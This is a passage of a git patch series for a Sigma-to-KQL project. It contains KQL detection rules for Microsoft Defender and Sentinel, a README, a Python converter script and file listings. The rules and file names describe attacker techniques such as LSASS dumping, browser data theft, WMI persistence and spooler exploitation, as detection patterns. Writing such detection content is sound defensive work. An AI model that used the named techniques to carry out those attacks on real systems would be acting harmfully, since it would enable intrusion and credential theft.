the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003 -DeviceImageLoadEvents -| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql b/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql deleted file mode 100644 index 36c7415d..00000000 --- a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2018/03/07 -// Level: medium -// Description: Detects WMI script event consumers -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003 -DeviceProcessEvents -| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql b/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql deleted file mode 100644 index 35ff8ce9..00000000 --- a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov -// Date: 2022/01/28 -// Level: high -// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors -// Tags: attack.privilege_escalation, attack.discovery, attack.t1033 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller") \ No newline at end of file diff --git a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql b/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql deleted file mode 100644 index 1742c500..00000000 --- a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects execution of the Windows Kernel Debugger "kd.exe". -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceProcessEvents -| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe" \ No newline at end of file diff --git a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql deleted file mode 100644 index e0568272..00000000 --- a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Thomas Patzke (improvements) -// Date: 2021/06/29 -// Level: informational -// Description: Detect DLL Load from Spooler Service backup folder -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527 -DeviceImageLoadEvents -| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/README.md b/README.md index 0cfa7def..f9bf000a 100644 --- a/README.md +++ b/README.md @@ -1,68 +1,104 @@ -# Sigma2KQL -Sigma Queries turned into KQL for Defender using [pysigma-backend-microsoft365defender](https://github.com/AttackIQ/pySigma-backend-microsoft365defender/tree/main) - -Reproducible Example: -```python -!git clone https://github.com/SigmaHQ/sigma.git -!pip install pysigma-backend-microsoft365defender -import os, glob -path = 'sigma/rules/*/' -file_pattern = os.path.join(path,'*.yml') -file_list_a = glob.glob(file_pattern) - -import yaml - -def convert_to_string(yaml_dict): - # We change default style of strings to None (it's '>' in PyYAML) - # This means that PyYAML will choose style based on the data - yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str - def repr_str(dumper, data): - if '\n' in data: - return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') - return dumper.org_represent_str(data) - yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper) - - yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper) - return yaml_str - -from sigma.rule import SigmaRule -from sigma.backends.microsoft365defender import Microsoft365DefenderBackend -from sigma.pipelines.microsoft365defender import microsoft_365_defender_pipeline - - -for yml in detections_yml_paths: - with open(yml) as yaml_file: - try: - yaml_contents = load(yaml_file, Loader=SafeLoader) - # Define an example rule as a YAML str - sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents)) - # Create backend, which automatically adds the pipeline - m365def_backend = Microsoft365DefenderBackend() - - # Or apply the pipeline manually - pipeline = microsoft_365_defender_pipeline() - pipeline.apply(sigma_rule) - - # Convert the rule - print(sigma_rule.title + " KQL Query: \n") - kql_query = m365def_backend.convert_rule(sigma_rule)[0] - print(kql_query) - print("\n \n ") - - # Write the KQL query to a .kql file - with open('/KQL/'+sigma_rule.title.replace(' ', '_') + '.kql', 'w') as kql_file: - # Write metadata as comments - kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n') - kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n') - kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n') - kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n') - # Here it's assumed that 'tags' is a list - tags = yaml_contents.get("tags", []) - kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') - # Write the actual KQL query - kql_file.write(kql_query) - - except: - print(sigma_rule.title + " KQL Query: \n") - print('SigmaTransformationError: Rule category not yet supported by the Microsoft 365 Defender Sigma backend.') +# Sigma2KQL - Working as of 15/11/2025 +Sigma Queries turned into KQL for Defender and Microsoft Snetinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) + +``` +├───rules +│ └───KQL +│ ├───Collection +│ ├───Command and Control +│ ├───Credential Access +│ ├───Defense Evasion +│ ├───Discovery +│ ├───Execution +│ ├───Exfiltration +│ ├───Impact +│ ├───Initial Access +│ ├───Lateral Movement +│ ├───Persistence +│ ├───Privilege Escalation +│ ├───Reconnaissance +│ └───Resource Development +├───rules-emerging-threats +│ └───KQL +└───rules-threat-hunting + └───KQL +``` + +## How do I use the helper to do this locally or in a Detection as Code pipeline? + +I've included a pip freeze of required librararies and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. + +### Run the following commands to get started: + +**Clone the sigma rules repository:** + +``` +git clone https://github.com/SigmaHQ/sigma.git +``` + +``` +python -m venv .venv +``` + +**With Windows:** +``` +.\.venv\Scripts\Activate.ps1 +``` + +**With Linux** +``` +./.venv/bin/activate +``` +**Once in your Python virtual env:** + +``` +pip install -r requirements.txt +``` + +**Then you can use the script like this:** + ``` +..\.venv\Scripts\python.exe .\helper.py --sigma-dir "C:/Users/Kaiber/sigma" --output-dir "C:/Users/Kaiber/Sigma2KQL-2025/KQL" +``` + +### Sample Rule Summary: + +``` +rules-threat-hunting Summary: + Successful: 96 + Failed: 33 + Tactics covered: 13 + +================================================================================ +OVERALL CONVERSION COMPLETE! +================================================================================ +Total files processed: 3637 +Total successful conversions: 2225 +Total failed conversions: 1412 + +Output base directory: D:\Projects\SigmaTerraform\Sigma2KQL-2025\KQL + +Folder structure created: + rules/ + rules-emerging-threats/ + rules-threat-hunting/ +``` + +### Sample Rule: + +``` +// Title: 7Zip Compressing Dump Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: medium +// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) +``` + diff --git a/helper.py b/helper.py new file mode 100644 index 00000000..d2bce32f --- /dev/null +++ b/helper.py @@ -0,0 +1,237 @@ +"""Helper script for converting sigma rules to kql for Microsoft Sentinel and Defender XDR.""" +import os +import glob +import argparse +import yaml +from yaml import load, SafeLoader +from sigma.rule import SigmaRule +from sigma.backends.kusto import KustoBackend +from sigma.pipelines.microsoftxdr import microsoft_xdr_pipeline + +# Parse command-line arguments +parser = argparse.ArgumentParser( + description='Convert Sigma rules to KQL queries for Microsoft Sentinel and Defender XDR', + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + python helper.py + python helper.py --sigma-dir ./sigma --output-dir ./output + python helper.py -s ../sigma -o ../KQL-Rules + """ +) +parser.add_argument( + '--sigma-dir', '-s', + type=str, + default='./sigma', + help='Path to the Sigma rules repository directory (default: ./sigma)' +) +parser.add_argument( + '--output-dir', '-o', + type=str, + default='./KQL', + help='Path to the output directory for KQL files (default: ./KQL)' +) + +args = parser.parse_args() + +print("Starting Script") + +# Define Sigma rule folders to process +SIGMA_BASE = os.path.abspath(args.sigma_dir) +OUTPUT_BASE = os.path.abspath(args.output_dir) + +RULE_FOLDERS = [ + "rules", + "rules-compliance", + "rules-dfir", + "rules-emerging-threats", + "rules-placeholder", + "rules-threat-hunting" +] + +print(f"Sigma base path: {SIGMA_BASE}") +print(f"Output base path: {OUTPUT_BASE}") +print(f"Rule folders to process: {', '.join(RULE_FOLDERS)}") +print("="*80) + +def convert_to_string(yaml_dict): + """Function converts yaml dict to string.""" + # We change default style of strings to None (it's '>' in PyYAML) + # This means that PyYAML will choose style based on the data + yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str + def repr_str(dumper, data): + if '\n' in data: + return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') + return dumper.org_represent_str(data) + yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper) + + yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper) + return yaml_str + + +def extract_mitre_tactic(tags): + """Extract MITRE ATT&CK tactic from tags.""" + # MITRE tactics mapping - using hyphens as that's what Sigma uses + tactics = { + 'attack.reconnaissance': 'Reconnaissance', + 'attack.resource-development': 'Resource Development', + 'attack.resource_development': 'Resource Development', + 'attack.initial-access': 'Initial Access', + 'attack.initial_access': 'Initial Access', + 'attack.execution': 'Execution', + 'attack.persistence': 'Persistence', + 'attack.privilege-escalation': 'Privilege Escalation', + 'attack.privilege_escalation': 'Privilege Escalation', + 'attack.defense-evasion': 'Defense Evasion', + 'attack.defense_evasion': 'Defense Evasion', + 'attack.credential-access': 'Credential Access', + 'attack.credential_access': 'Credential Access', + 'attack.discovery': 'Discovery', + 'attack.lateral-movement': 'Lateral Movement', + 'attack.lateral_movement': 'Lateral Movement', + 'attack.collection': 'Collection', + 'attack.command-and-control': 'Command and Control', + 'attack.command_and_control': 'Command and Control', + 'attack.exfiltration': 'Exfiltration', + 'attack.impact': 'Impact' + } + + if not tags: + return 'Uncategorized' + + # Find the first matching tactic + for tag in tags: + tag_lower = tag.lower() + for tactic_key, tactic_name in tactics.items(): + if tag_lower.startswith(tactic_key): + return tactic_name + + return 'Uncategorized' + + +# Overall Statistics +TOTAL_SUCCESSFUL = 0 +TOTAL_FAILED = 0 +overall_stats = {} + +# Process each rule folder +for rule_folder in RULE_FOLDERS: + print(f"\nProcessing: {rule_folder}") + print("-"*80) + + # Get all YAML files from this rule folder + PATH = os.path.join(SIGMA_BASE, rule_folder) + file_pattern = os.path.join(PATH, '**', '*.yml') + file_list = glob.glob(file_pattern, recursive=True) + + print(f"Found {len(file_list)} Sigma rule files in {rule_folder}") + + if not file_list: + print(f"No files found in {rule_folder}, skipping...") + continue + + # Statistics for this folder + SUCCESSFUL_CONVERSIONS = 0 + FAILED_CONVERSIONS = 0 + tactic_stats = {} + + for idx, yml in enumerate(file_list, 1): + try: + with open(yml, encoding='utf-8') as yaml_file: + yaml_contents = load(yaml_file, Loader=SafeLoader) + + # Define an example rule as a YAML str + sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents)) + + # Create backend with the pipeline + pipeline = microsoft_xdr_pipeline() + backend = KustoBackend(processing_pipeline=pipeline) + + # Convert the rule + kql_query = backend.convert_rule(sigma_rule)[0] + + # Get MITRE tactic from tags + tags = yaml_contents.get("tags", []) + TACTIC_FOLDER = extract_mitre_tactic(tags) + + # Write the KQL query to a .kql file organized by tactic + BASE_OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder) + OUTPUT_DIR = os.path.join(BASE_OUTPUT_DIR, TACTIC_FOLDER) + os.makedirs(OUTPUT_DIR, exist_ok=True) + + # Sanitize filename and convert to snake_case + SAFE_FILENAME = "".join(c if c.isalnum() or c in (' ', '_', '-') else '_' for c in sigma_rule.title) + # Convert to lowercase snake_case + SNAKE_CASE_FILENAME = SAFE_FILENAME.replace(' ', '_').replace('-', '_').lower() + # Remove multiple consecutive underscores + while '__' in SNAKE_CASE_FILENAME: + SNAKE_CASE_FILENAME = SNAKE_CASE_FILENAME.replace('__', '_') + output_file = os.path.join(OUTPUT_DIR, SNAKE_CASE_FILENAME + '.kql') + + with open(output_file, 'w', encoding='utf-8') as kql_file: + # Write metadata as comments + kql_file.write(f'// Title: {sigma_rule.title}\n') + kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n') + kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n') + kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n') + kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n') + kql_file.write(f'// MITRE Tactic: {TACTIC_FOLDER}\n') + kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') + + # Write false positives if present + false_positives = yaml_contents.get("falsepositives", []) + if false_positives: + # Filter out empty or "unknown" entries + valid_fps = [str(fp).strip() for fp in false_positives + if fp and str(fp).strip() and str(fp).strip().lower() != 'unknown'] + if valid_fps: + kql_file.write('// False Positives:\n') + for fp_str in valid_fps: + kql_file.write(f'// - {fp_str}\n') + + kql_file.write('\n') + # Write the actual KQL query + kql_file.write(kql_query) + + SUCCESSFUL_CONVERSIONS += 1 + # Track by tactic + tactic_stats[TACTIC_FOLDER] = tactic_stats.get(TACTIC_FOLDER, 0) + 1 + + if SUCCESSFUL_CONVERSIONS % 10 == 0: + print(f"[{idx}/{len(file_list)}] {rule_folder}: Converted: {SUCCESSFUL_CONVERSIONS}") + print(f"Failed: {FAILED_CONVERSIONS}") + + except Exception as e: + FAILED_CONVERSIONS += 1 + rule_name = yaml_contents.get('title', os.path.basename(yml)) if 'yaml_contents' in locals() else os.path.basename(yml) + if FAILED_CONVERSIONS <= 5: # Only show first 5 errors in detail + print(f"[{idx}/{len(file_list)}] {rule_name} - Error: {str(e)[:100]}") + # Continue to next file # Print statistics for this folder + print(f"\n{rule_folder} Summary:") + print(f" Successful: {SUCCESSFUL_CONVERSIONS}") + print(f" Failed: {FAILED_CONVERSIONS}") + if tactic_stats: + print(f" Tactics covered: {len(tactic_stats)}") + + # Update overall statistics + TOTAL_SUCCESSFUL += SUCCESSFUL_CONVERSIONS + TOTAL_FAILED += FAILED_CONVERSIONS + + # Merge tactic stats + for tactic, count in tactic_stats.items(): + folder_key = f"{rule_folder}/{tactic}" + overall_stats[folder_key] = count + +# Print final statistics +print("\n" + "="*80) +print("OVERALL CONVERSION COMPLETE!") +print("="*80) +print(f"Total files processed: {TOTAL_SUCCESSFUL + TOTAL_FAILED}") +print(f"Total successful conversions: {TOTAL_SUCCESSFUL}") +print(f"Total failed conversions: {TOTAL_FAILED}") +print(f"\nOutput base directory: {OUTPUT_BASE}") +print("\nFolder structure created:") +for rule_folder in RULE_FOLDERS: + folder_path = os.path.join(OUTPUT_BASE, rule_folder) + if os.path.exists(folder_path): + print(f" {rule_folder}/") diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 00000000..d28a44be --- /dev/null +++ b/requirements.txt @@ -0,0 +1,15 @@ +certifi==2025.11.12 +charset-normalizer==3.4.4 +idna==3.11 +Jinja2==3.1.6 +MarkupSafe==3.0.3 +packaging==24.2 +pyaml==25.7.0 +pyparsing==3.2.5 +pySigma==0.11.23 +pySigma-backend-kusto==0.4.4 +pySigma-backend-microsoft365defender==0.3.2 +PyYAML==6.0.3 +requests==2.32.5 +sigma==0.0.1 +urllib3==2.5.0 From 356a11001569e7d6eeb748b4a83fcfc2665f67c5 Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sat, 15 Nov 2025 17:43:29 +1100 Subject: [PATCH 02/17] Updated readme with disclaimer and sample sigma to kql conversion. --- README.md | 45 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) diff --git a/README.md b/README.md index f9bf000a..3a738095 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,8 @@ # Sigma2KQL - Working as of 15/11/2025 Sigma Queries turned into KQL for Defender and Microsoft Snetinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) +__Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ + ``` ├───rules │ └───KQL @@ -86,6 +88,49 @@ Folder structure created: ### Sample Rule: +**Sigma Rule:** +``` +title: 7Zip Compressing Dump Files +id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 +related: + - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc + type: derived +status: test +description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +references: + - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022-09-27 +modified: 2023-09-12 +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Description|contains: '7-Zip' + - Image|endswith: + - '\7z.exe' + - '\7zr.exe' + - '\7za.exe' + - OriginalFileName: + - '7z.exe' + - '7za.exe' + selection_extension: + CommandLine|contains: + - '.dmp' + - '.dump' + - '.hdmp' + condition: all of selection_* +falsepositives: + - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally + - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting +level: medium +``` + +**KQL Rule:** ``` // Title: 7Zip Compressing Dump Files // Author: Nasreddine Bencherchali (Nextron Systems) From 415ccac9e5f476ff4b09597f2a4f5f294a648857 Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sat, 15 Nov 2025 18:10:10 +1100 Subject: [PATCH 03/17] Better multi-line description handling for the helper script and updated the rules repo to match the current state of the helper script. --- ..._exe_file_creation_by_uncommon_process.kql | 7 +++--- ...eamer_rat_loading_net_executable_image.kql | 1 - ...ulnerability_cve_2025_33053_image_load.kql | 5 ++-- .../potential_pikabot_c2_activity.kql | 3 +-- ..._file_potential_cve_2025_24054_exploit.kql | 3 +-- ...t_apt_scheduled_task_creation_registry.kql | 1 - .../flowcloud_registry_markers.kql | 3 +-- ...st_blizzard_apt_file_creation_activity.kql | 3 +-- ...t_javascript_constrained_file_creation.kql | 3 +-- ...blizzard_apt_process_creation_activity.kql | 3 +-- ...ka_backdoor_execution_via_rundll32_exe.kql | 1 - ...l_extension_execution_via_rundll32_exe.kql | 1 - ...al_kapeka_decrypted_backdoor_indicator.kql | 3 +-- ...cious_command_combinations_via_cmd_exe.kql | 5 ++-- ...raspberry_robin_cpl_execution_activity.kql | 3 +-- ...t_slashandgrab_exploitation_indicators.kql | 1 - .../potential_pikabot_discovery_activity.kql | 3 +-- .../cve_2021_26858_exchange_exploitation.kql | 5 ++-- ...icious_confluence_child_process_linux_.kql | 1 - ...ious_confluence_child_process_windows_.kql | 1 - ...kgate_autoit3_exe_execution_parameters.kql | 5 ++-- .../emotet_loader_execution_via_lnk_file.kql | 3 +-- ...25_59287_wsus_suspicious_child_process.kql | 3 +-- .../file_creation_related_to_rat_clients.kql | 1 - ...apeka_backdoor_loaded_via_rundll32_exe.kql | 3 +-- .../Execution/katz_stealer_dll_loaded.kql | 5 ++-- ...tential_apt_fin7_exploitation_activity.kql | 3 +-- ...space_one_access_remote_code_execution.kql | 3 +-- ...al_cve_2022_29072_exploitation_attempt.kql | 5 ++-- ...ect_os_command_injection_file_creation.kql | 3 +-- ...2024_3094_suspicious_ssh_child_process.kql | 1 - ...uspicious_creation_of_esx_admins_group.kql | 5 ++-- ...kabot_activity_lure_document_execution.kql | 3 +-- ...tation_dynamic_compilation_via_csc_exe.kql | 10 +++----- ...ential_sap_netweaver_webshell_creation.kql | 3 +-- ..._sap_netweaver_webshell_creation_linux.kql | 3 +-- ...snif_redirection_of_discovery_commands.kql | 1 - ..._authentication_bypass_cve_2025_57791_.kql | 3 +-- ...e_2024_50623_exploitation_attempt_cleo.kql | 1 - ...28_exploitation_attempt_vmware_horizon.kql | 1 - ...tation_of_goanywhere_mft_vulnerability.kql | 3 +-- ...ve_2025_53770_exploitation_file_create.kql | 3 +-- ...cve_2025_53770_exploitation_indicators.kql | 3 +-- .../suspicious_crushftp_child_process.kql | 5 ++-- .../blackbyte_ransomware_registry.kql | 5 ++-- ...raversal_webshell_drop_cve_2025_57790_.kql | 3 +-- ..._suspicious_new_printer_ports_registry.kql | 3 +-- ...eenconnect_path_traversal_exploitation.kql | 1 - ...eka_backdoor_configuration_persistence.kql | 3 +-- ...coldsteel_persistence_service_dll_load.kql | 1 - ...tivity_shutdown_schedule_task_creation.kql | 3 +-- ...al_notepad_cve_2025_49144_exploitation.kql | 5 ++-- ...registry_set_internet_settings_zonemap.kql | 3 +-- ...reenconnect_user_database_modification.kql | 3 +-- ..._spawned_by_centrestack_portal_apppool.kql | 1 - ...spooler_service_suspicious_binary_load.kql | 1 - ...user_and_guid_password_cve_2025_57788_.kql | 3 +-- ...d_apt_custom_protocol_handler_creation.kql | 3 +-- ...stom_protocol_handler_dll_registry_set.kql | 3 +-- ...ss_spawning_rundll32_guloader_activity.kql | 3 +-- .../kapeka_backdoor_persistence_activity.kql | 9 ++++--- ...vity_execution_of_more_com_and_vbc_exe.kql | 5 ++-- ..._potential_cve_2025_32463_exploitation.kql | 7 +++--- ...l_cve_2024_35250_exploitation_activity.kql | 1 - ...ot_activity_winlogon_shell_persistence.kql | 1 - .../potential_pikabot_hollowing_activity.kql | 3 +-- ...r_payload_execution_via_scheduled_task.kql | 5 ++-- .../clipboard_data_collection_via_pbpaste.kql | 9 ++++--- ...ion_initiated_from_users_public_folder.kql | 5 ++-- ...suspicious_azure_front_door_connection.kql | 3 +-- ...ary_code_execution_and_remote_sessions.kql | 24 +++++++------------ ...e_code_tunnel_execution_file_indicator.kql | 1 - ...dential_files_by_uncommon_applications.kql | 5 ++-- ...nsitive_files_by_uncommon_applications.kql | 3 +-- ..._loaded_by_uncommon_suspicious_process.kql | 7 +++--- ...og_query_requests_by_builtin_utilities.kql | 1 - .../Credential Access/pfx_file_creation.kql | 13 ++++------ .../unattend_xml_file_access_attempt.kql | 3 +-- ...ok_mail_files_by_uncommon_applications.kql | 5 ++-- ...tsproxy_dll_loaded_by_uncommon_process.kql | 3 +-- .../codepage_modification_via_mode_com.kql | 3 +-- .../diskshadow_script_mode_execution.kql | 1 - ...ork_connection_to_non_local_ip_address.kql | 5 ++-- ...dless_process_launched_via_conhost_exe.kql | 3 +-- ..._exe_initiated_http_network_connection.kql | 1 - ..._the_cryptography_powershell_namespace.kql | 5 ++-- .../microsoft_workflow_compiler_execution.kql | 1 - ...initiated_network_connection_over_http.kql | 5 ++-- ...cting_package_created_via_iexpress_exe.kql | 5 ++-- ...e_added_via_new_netfirewallrule_cmdlet.kql | 1 - ...e_obfuscation_using_unicode_characters.kql | 3 +-- ...sideloading_activity_via_extexport_exe.kql | 5 ++-- ...on_via_explorer_exe_from_shell_process.kql | 7 +++--- ..._execution_from_guid_like_folder_names.kql | 3 +-- ..._the_cryptography_powershell_namespace.kql | 5 ++-- ...isterserver_export_function_explicitly.kql | 1 - ...rvice_binary_in_user_controlled_folder.kql | 7 +++--- .../use_short_name_path_in_command_line.kql | 13 +++++----- ..._file_creation_in_codeintegrity_folder.kql | 1 - .../Discovery/cmd_shell_output_redirect.kql | 3 +-- .../Discovery/process_discovery.kql | 3 +-- ...tem_information_discovery_via_wmic_exe.kql | 5 ++-- .../arbitrary_command_execution_using_wsl.kql | 1 - .../cab_file_extraction_via_wusa_exe.kql | 1 - ...d_executed_via_run_dialog_box_registry.kql | 3 +-- ..._of_script_inside_of_a_compressed_file.kql | 13 ++++------ .../microsoft_word_add_in_loaded.kql | 1 - ...ection_initiated_by_powershell_process.kql | 5 ++-- ...tware_execution_uc_berkeley_signature_.kql | 3 +-- ...l_file_override_append_via_set_command.kql | 7 +++--- ..._suspicious_powershell_child_processes.kql | 3 +-- .../process_execution_from_webdav_share.kql | 5 ++-- ...path_configuration_file_creation_linux.kql | 5 ++-- ...path_configuration_file_creation_macos.kql | 5 ++-- ...th_configuration_file_creation_windows.kql | 5 ++-- ...s_tool_cmd_exe_execution_via_anyviewer.kql | 1 - ...nnect_remote_command_execution_hunting.kql | 3 +-- ...m_potential_suspicious_parent_location.kql | 3 +-- ...s_new_instance_of_an_office_com_object.kql | 3 +-- .../process_terminated_via_taskkill.kql | 3 +-- .../execution_from_webserver_root_folder.kql | 1 - ...ted_in_potentially_suspicious_location.kql | 5 ++-- .../elevated_system_shell_spawned.kql | 1 - ...kerberos_coercion_via_dns_spn_spoofing.kql | 13 +++++----- .../clipboard_collection_with_xclip_tool.kql | 3 +-- .../compressed_file_creation_via_tar_exe.kql | 3 +-- ...compressed_file_extraction_via_tar_exe.kql | 3 +-- ...ous_output_via_compress_archive_cmdlet.kql | 3 +-- ...ckup_for_system_registry_hives_enabled.kql | 3 +-- ...ed_disableaidataanalysis_value_deleted.kql | 5 ++-- ...indows_recall_feature_enabled_registry.kql | 5 ++-- ...ows_recall_feature_enabled_via_reg_exe.kql | 7 +++--- .../anydesk_temporary_artefact.kql | 5 ++-- .../cloudflared_portable_execution.kql | 1 - .../cloudflared_quick_tunnel_execution.kql | 5 ++-- ...localtonet_tunneling_service_initiated.kql | 5 ++-- ...onet_tunneling_service_initiated_linux.kql | 5 ++-- .../finger_exe_execution.kql | 5 ++-- ...assist_temporary_installation_artefact.kql | 5 ++-- ...interchange_format_file_via_ldifde_exe.kql | 1 - ...ection_initiated_by_script_interpreter.kql | 1 - ...vestandaloneupdater_exe_proxy_download.kql | 3 +-- ...k_connection_initiated_by_imewdbld_exe.kql | 1 - ...tially_suspicious_or_uncommon_location.kql | 1 - ...urewebsites_net_by_non_browser_process.kql | 1 - ...to_potential_dead_drop_resolver_domain.kql | 3 +-- .../potentially_suspicious_usage_of_qemu.kql | 3 +-- .../pua_ngrok_execution.kql | 3 +-- .../quickassist_execution.kql | 1 - .../remote_access_tool_anydesk_execution.kql | 5 ++-- ...ydesk_execution_from_suspicious_folder.kql | 5 ++-- ...emote_access_tool_gotoassist_execution.kql | 5 ++-- .../remote_access_tool_logmein_execution.kql | 5 ++-- ...gent_command_execution_via_meshcentral.kql | 3 +-- ...emote_access_tool_netsupport_execution.kql | 5 ++-- ...ol_potential_meshagent_execution_macos.kql | 5 ++-- ..._potential_meshagent_execution_windows.kql | 5 ++-- ...tool_renamed_meshagent_execution_macos.kql | 5 ++-- ...ol_renamed_meshagent_execution_windows.kql | 5 ++-- ...te_access_tool_screenconnect_execution.kql | 5 ++-- ...al_suspicious_remote_command_execution.kql | 1 - ...mote_access_tool_simple_help_execution.kql | 5 ++-- ...potentially_attacker_controlled_server.kql | 5 ++-- ...mote_access_tool_ultraviewer_execution.kql | 5 ++-- ...e_code_tunnel_execution_file_indicator.kql | 1 - ...onnect_temporary_installation_artefact.kql | 5 ++-- .../suspicious_binary_writes_via_anydesk.kql | 5 ++-- ...suspicious_certreq_command_to_download.kql | 5 ++-- ..._network_communication_with_google_api.kql | 1 - ...k_connection_initiated_by_certutil_exe.kql | 3 +-- ...tudio_code_tunnel_remote_file_creation.kql | 1 - ...rency_wallets_by_uncommon_applications.kql | 3 +-- ..._history_file_by_uncommon_applications.kql | 3 +-- ...i_master_keys_by_uncommon_applications.kql | 3 +-- ...anager_access_by_uncommon_applications.kql | 3 +-- ...ys_and_certificate_export_activity_ioc.kql | 1 - ...numeration_for_credentials_in_registry.kql | 5 ++-- ...ccess_of_signal_desktop_sensitive_data.kql | 7 +++--- .../hacktool_lazagne_execution.kql | 3 +-- .../hacktool_remotekrbrelay_execution.kql | 1 - .../hacktool_winpwn_execution.kql | 1 - ...resting_service_enumeration_via_sc_exe.kql | 3 +-- ...ed_module_enumeration_via_tasklist_exe.kql | 5 ++-- .../lsass_dump_keyword_in_commandline.kql | 1 - ...e_file_access_by_uncommon_applications.kql | 1 - ...neric_credentials_added_via_cmdkey_exe.kql | 3 +-- ...uration_reconnaissance_via_findstr_exe.kql | 3 +-- .../potential_browser_data_stealing.kql | 5 ++-- ..._sniffing_activity_using_network_tools.kql | 5 ++-- ...istory_access_attempt_via_history_file.kql | 3 +-- ...fender_av_bypass_via_dump64_exe_rename.kql | 3 +-- ...ommand_targeting_teams_sensitive_files.kql | 3 +-- ...con_activity_using_log_query_utilities.kql | 